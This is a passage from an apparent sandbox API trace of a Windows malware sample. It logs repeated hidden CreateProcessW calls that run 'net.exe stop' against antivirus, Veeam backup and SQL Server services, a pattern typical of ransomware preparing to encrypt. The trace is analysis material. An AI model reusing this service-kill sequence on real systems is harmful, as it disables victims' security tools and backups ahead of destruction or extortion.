(hObject=0x3f8) returned 1 [0103.177] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.177] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.177] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.177] CoTaskMemFree (pv=0x741d20) [0103.177] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop KAVFS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x23d1eb0 | out: lpCommandLine="\"net.exe\" stop KAVFS /y", lpProcessInformation=0x23d1eb0*(hProcess=0x3c4, hThread=0x3f8, dwProcessId=0xcf0, dwThreadId=0x720)) returned 1 [0103.183] CloseHandle (hObject=0x470) returned 1 [0103.183] GetFileType (hFile=0x3f0) returned 0x3 [0103.183] CloseHandle (hObject=0x3f8) returned 1 [0103.183] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.183] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.183] GetCurrentProcess () returned 0xffffffff [0103.183] GetCurrentProcess () returned 0xffffffff [0103.183] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x468) returned 1 [0103.183] CloseHandle (hObject=0x3f8) returned 1 [0103.184] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.184] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.184] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.184] CoTaskMemFree (pv=0x741d20) [0103.184] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLWriter /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x23d5760 | out: lpCommandLine="\"net.exe\" stop SQLWriter /y", lpProcessInformation=0x23d5760*(hProcess=0x3e0, hThread=0x3f8, dwProcessId=0x718, dwThreadId=0x310)) returned 1 [0103.298] CloseHandle (hObject=0x470) returned 1 [0103.298] GetFileType (hFile=0x468) returned 0x3 [0103.298] CloseHandle (hObject=0x3f8) returned 1 [0103.299] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.299] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.299] GetCurrentProcess () returned 0xffffffff [0103.299] GetCurrentProcess () returned 0xffffffff [0103.299] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x454) returned 1 [0103.299] CloseHandle (hObject=0x3f8) returned 1 [0103.299] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.299] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.299] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.299] CoTaskMemFree (pv=0x741d20) [0103.300] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SBSMONITORING /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef70*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x2756750 | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SBSMONITORING /y", lpProcessInformation=0x2756750*(hProcess=0x38c, hThread=0x3f8, dwProcessId=0xad4, dwThreadId=0xb78)) returned 1 [0103.305] CloseHandle (hObject=0x470) returned 1 [0103.305] GetFileType (hFile=0x454) returned 0x3 [0103.305] CloseHandle (hObject=0x3f8) returned 1 [0103.306] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.306] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.306] GetCurrentProcess () returned 0xffffffff [0103.306] GetCurrentProcess () returned 0xffffffff [0103.306] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x394) returned 1 [0103.306] CloseHandle (hObject=0x3f8) returned 1 [0103.306] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.306] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.306] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.306] CoTaskMemFree (pv=0x741d20) [0103.306] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop KAVFSGT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x275a020 | out: lpCommandLine="\"net.exe\" stop KAVFSGT /y", lpProcessInformation=0x275a020*(hProcess=0x3c4, hThread=0x3f8, dwProcessId=0xae0, dwThreadId=0xae8)) returned 1 [0103.312] CloseHandle (hObject=0x470) returned 1 [0103.312] GetFileType (hFile=0x394) returned 0x3 [0103.312] CloseHandle (hObject=0x3f8) returned 1 [0103.312] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.312] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.312] GetCurrentProcess () returned 0xffffffff [0103.312] GetCurrentProcess () returned 0xffffffff [0103.313] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3f0) returned 1 [0103.313] CloseHandle (hObject=0x3f8) returned 1 [0103.313] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.313] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.313] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.313] CoTaskMemFree (pv=0x741d20) [0103.313] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamBackupSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x275d8d0 | out: lpCommandLine="\"net.exe\" stop VeeamBackupSvc /y", lpProcessInformation=0x275d8d0*(hProcess=0x37c, hThread=0x3f8, dwProcessId=0x2a8, dwThreadId=0x34c)) returned 1 [0103.318] CloseHandle (hObject=0x470) returned 1 [0103.319] GetFileType (hFile=0x3f0) returned 0x3 [0103.319] CloseHandle (hObject=0x3f8) returned 1 [0103.319] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.319] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.319] GetCurrentProcess () returned 0xffffffff [0103.319] GetCurrentProcess () returned 0xffffffff [0103.319] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x2c4) returned 1 [0103.319] CloseHandle (hObject=0x3f8) returned 1 [0103.319] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.320] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.320] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.320] CoTaskMemFree (pv=0x741d20) [0103.320] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SHAREPOINT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef78*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x276119c | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SHAREPOINT /y", lpProcessInformation=0x276119c*(hProcess=0x3a0, hThread=0x3f8, dwProcessId=0xc64, dwThreadId=0xd88)) returned 1 [0103.325] CloseHandle (hObject=0x470) returned 1 [0103.325] GetFileType (hFile=0x2c4) returned 0x3 [0103.325] CloseHandle (hObject=0x3f8) returned 1 [0103.325] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.325] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.325] GetCurrentProcess () returned 0xffffffff [0103.325] GetCurrentProcess () returned 0xffffffff [0103.326] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3d4) returned 1 [0103.326] CloseHandle (hObject=0x3f8) returned 1 [0103.326] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.326] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.326] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.326] CoTaskMemFree (pv=0x741d20) [0103.326] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop kavfsslp /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x2764a68 | out: lpCommandLine="\"net.exe\" stop kavfsslp /y", lpProcessInformation=0x2764a68*(hProcess=0x44c, hThread=0x3f8, dwProcessId=0xcc8, dwThreadId=0xcb8)) returned 1 [0103.331] CloseHandle (hObject=0x470) returned 1 [0103.331] GetFileType (hFile=0x3d4) returned 0x3 [0103.331] CloseHandle (hObject=0x3f8) returned 1 [0103.332] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.332] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.332] GetCurrentProcess () returned 0xffffffff [0103.332] GetCurrentProcess () returned 0xffffffff [0103.332] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3a8) returned 1 [0103.333] CloseHandle (hObject=0x3f8) returned 1 [0103.333] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.333] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.333] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.333] CoTaskMemFree (pv=0x741d20) [0103.333] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamBrokerSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x2768374 | out: lpCommandLine="\"net.exe\" stop VeeamBrokerSvc /y", lpProcessInformation=0x2768374*(hProcess=0x408, hThread=0x3f8, dwProcessId=0xda0, dwThreadId=0xdbc)) returned 1 [0103.994] CloseHandle (hObject=0x470) returned 1 [0103.999] GetFileType (hFile=0x3a8) returned 0x3 [0103.999] CloseHandle (hObject=0x3f8) returned 1 [0105.593] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.593] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3b4, hWritePipe=0x5f2f044*=0x448) returned 1 [0105.593] GetCurrentProcess () returned 0xffffffff [0105.593] GetCurrentProcess () returned 0xffffffff [0105.593] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x38c) returned 1 [0105.593] CloseHandle (hObject=0x3b4) returned 1 [0105.593] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.593] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.594] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.594] CoTaskMemFree (pv=0x741d20) [0105.594] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef7c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2288214 | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SQL_2008 /y", lpProcessInformation=0x2288214*(hProcess=0x3e0, hThread=0x3b4, dwProcessId=0xf1c, dwThreadId=0xf44)) returned 1 [0105.608] CloseHandle (hObject=0x448) returned 1 [0105.608] GetFileType (hFile=0x38c) returned 0x3 [0105.608] CloseHandle (hObject=0x3b4) returned 1 [0106.352] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.352] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x448, hWritePipe=0x5f2f044*=0x47c) returned 1 [0106.353] GetCurrentProcess () returned 0xffffffff [0106.353] GetCurrentProcess () returned 0xffffffff [0106.353] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x49c) returned 1 [0106.353] CloseHandle (hObject=0x448) returned 1 [0106.353] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.353] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.353] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.353] CoTaskMemFree (pv=0x741d20) [0106.353] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop klnagent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x23f798c | out: lpCommandLine="\"net.exe\" stop klnagent /y", lpProcessInformation=0x23f798c*(hProcess=0x498, hThread=0x448, dwProcessId=0x100c, dwThreadId=0x1010)) returned 1 [0106.357] CloseHandle (hObject=0x47c) returned 1 [0106.357] GetFileType (hFile=0x49c) returned 0x3 [0106.358] CloseHandle (hObject=0x448) returned 1 [0107.158] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0107.158] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x47c, hWritePipe=0x5f2f044*=0x4e0) returned 1 [0107.159] GetCurrentProcess () returned 0xffffffff [0107.159] GetCurrentProcess () returned 0xffffffff [0107.159] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x4f0) returned 1 [0107.159] CloseHandle (hObject=0x47c) returned 1 [0107.159] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.159] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0107.159] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0107.159] CoTaskMemFree (pv=0x741d20) [0107.159] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamCatalogSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef8c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x2422594 | out: lpCommandLine="\"net.exe\" stop VeeamCatalogSvc /y", lpProcessInformation=0x2422594*(hProcess=0x448, hThread=0x47c, dwProcessId=0x10b4, dwThreadId=0x10b8)) returned 1 [0107.732] CloseHandle (hObject=0x4e0) returned 1 [0107.737] GetFileType (hFile=0x4f0) returned 0x3 [0107.737] CloseHandle (hObject=0x47c) returned 1 [0110.669] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0110.669] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x4f8, hWritePipe=0x5f2f044*=0x3e0) returned 1 [0110.669] GetCurrentProcess () returned 0xffffffff [0110.669] GetCurrentProcess () returned 0xffffffff [0110.669] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x47c) returned 1 [0110.669] CloseHandle (hObject=0x4f8) returned 1 [0110.669] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.669] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0110.670] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0110.670] CoTaskMemFree (pv=0x741d20) [0110.670] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef78*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2272c1c | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$SYSTEM_BGC /y", lpProcessInformation=0x2272c1c*(hProcess=0x4e0, hThread=0x4f8, dwProcessId=0x1180, dwThreadId=0x1184)) returned 1 [0111.556] CloseHandle (hObject=0x3e0) returned 1 [0111.556] GetFileType (hFile=0x47c) returned 0x3 [0111.556] CloseHandle (hObject=0x4f8) returned 1 [0112.561] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.562] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x4f8, hWritePipe=0x5f2f044*=0x3e0) returned 1 [0112.562] GetCurrentProcess () returned 0xffffffff [0112.562] GetCurrentProcess () returned 0xffffffff [0112.562] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x458) returned 1 [0112.562] CloseHandle (hObject=0x4f8) returned 1 [0112.562] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.562] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.562] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.562] CoTaskMemFree (pv=0x741d20) [0112.562] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop macmnsvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24ccafc | out: lpCommandLine="\"net.exe\" stop macmnsvc /y", lpProcessInformation=0x24ccafc*(hProcess=0x438, hThread=0x4f8, dwProcessId=0x12a0, dwThreadId=0x12a4)) returned 1 [0112.579] CloseHandle (hObject=0x3e0) returned 1 [0112.579] GetFileType (hFile=0x458) returned 0x3 [0112.579] CloseHandle (hObject=0x4f8) returned 1 [0114.686] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0114.686] CreatePipe (in: 